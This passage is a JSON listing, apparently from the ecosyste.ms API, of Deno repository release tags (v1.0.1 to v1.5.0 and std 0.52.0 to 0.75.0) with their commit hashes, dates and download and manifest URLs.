s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","p